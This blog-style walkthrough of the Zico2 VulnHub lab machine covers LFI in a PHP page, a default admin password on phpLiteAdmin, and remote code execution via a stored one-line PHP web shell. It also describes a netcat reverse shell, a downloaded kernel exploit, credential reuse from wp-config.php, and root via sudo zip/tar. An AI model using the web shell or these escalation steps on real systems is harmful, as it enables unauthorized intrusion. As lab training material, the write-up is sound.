Zico2:1 vulnhub walkthrough
Hello friends. Today I will share with you another writeup for vulnhub walkthrough vulnerable machines. The selected target will be Zico2. You can download it from the following link : https://download.vulnhub.com/zico/zico2.ova
In this article you will learn the following:
- Using nmap to find opened ports & running services.
- Finding PHP File Includes vulnerabilities.
- Brute-forcing web directories.
- Searching for software public exploits using searchsploit.
- Privilege escalation using kernel exploits.
- Searching for sensitive user data.
- Privilege escalation using zip command.
- Privilege escalation using tar command.
After downloading and importing the OVA file to virtual-box (it doesn’t work on Vmware) you can power it on and start hacking.
The first thing we should do is finding the IP address for the target. So, I perform a ping scan to the whole network and I got that the IP address for this host is 10.0.2.20
After that, I perform a full port scan to find all open ports, running services, and OS version.
I found that this target has only 3 open ports (22 SSH, 80 HTTP, and 111 RPC). I started with the HTTP port by browsing the website hosting on this web server.
I found that the website is an HTML template. Enumerating the home page, I found that it contains a link for a page called “view.php”. This page has a parameter called “page” which takes the page name to display.
I start testing this page for “PHP File Include” vulnerability. I check the LFI (Local File Include) and succeeded. I can read the content of passwd file in Linux as follows:
Testing for RFI (Remote File Include) failed since the php.ini file configured to not accept including files from outside the server. So, I have to find a way to upload my shell (PHP shell) to the server and call it from this vulnerable page.
Let’s start now brute-forcing the web directories using my favorite tool “dirbuster” (you can use any other directory brute-forcing tools such like : dirb, … etc).
At the end of brute-forcing process, I found that it contains a directory called “dbadmin”.
By browsing this directory, I found that it contains a “PHP” file which is admin script for “sqlite” database system.
This version of phpLiteAdmin, which is v1.9.3 is vulnerable to remote code execution.
But I have to login. So, by trying “admin” as a password I logged in to the system.
I followed the exploit instructions:
1- create new database (I select the name to be “hackingresources.php”).
2- create new table with one column.
3- select the type of the column to be “TEXT” and the default value to be your shell “<?php echo system($_GET[“cmd”]); ?>”.
You can find that this script stored in “/usr/databases/” directory. So, to execute it we can use the previously detected LFI vulnerability as follows:
I found that python installed in the back-end server, so we can use the uploaded shell to run the python to get a reverse shell using “nc”.
After getting the reverse shell, I checked the kernel version for the back-end server. After searching for kernel root, I found that there exists many root exploits, so I copied one of them to my “Kali Linux” Apache server home directory, then I start the Apache service.
After that I downloaded the exploit to the back-end server using wget command and store it in /tmp directory. After that I compiled it and run it to get root access (privileges).
Digging more on the back-end server, I found another way to get root 😀
By checking the /etc/passwd file contents, I found that there is a user called “zico” and the home directory is “/home/zico” (note: I did this without root privileges, just with www-data user). When I list the contents of “zico” home directory, I found a file called “to_do.txt” and another directories.
Reading the content of this file I found that it contains a hint for me to explore the other directories. So, I tried joomla and searched for the “configuration.php” file but it was deleted. SO, I tried the wordpress and I found that the “wp-config.php” file contains credentials for the mysql db. The interesting things is that the username is identical to the username in linux box. So, I tried to ssh using these credentials and succeeded.
Then I tried the sudo command to list all the commands the user can run with root privileges. I found that the user can run both tar and zip commands as root without the need to enter the password.
So, what I’m going to do is to escalate the privilege from “zico” to “root” in two ways.
The first one is using the zip command, which looks like this:
** I take the –unzip-command option which is available in zip command to run the bash shell while zipping the file.
The other way is using the tar command which looks like this:
As mentioned in previous writeups, we can escalate privilege using find command if the command has SUID enabled. So, I used the tar command to SUID the find command and then use the find command to get root.
I hope you enjoyed and learn new thing in pen-testing field. If you have an question or comments, please write them down in the comments and wait for the next writeup 😀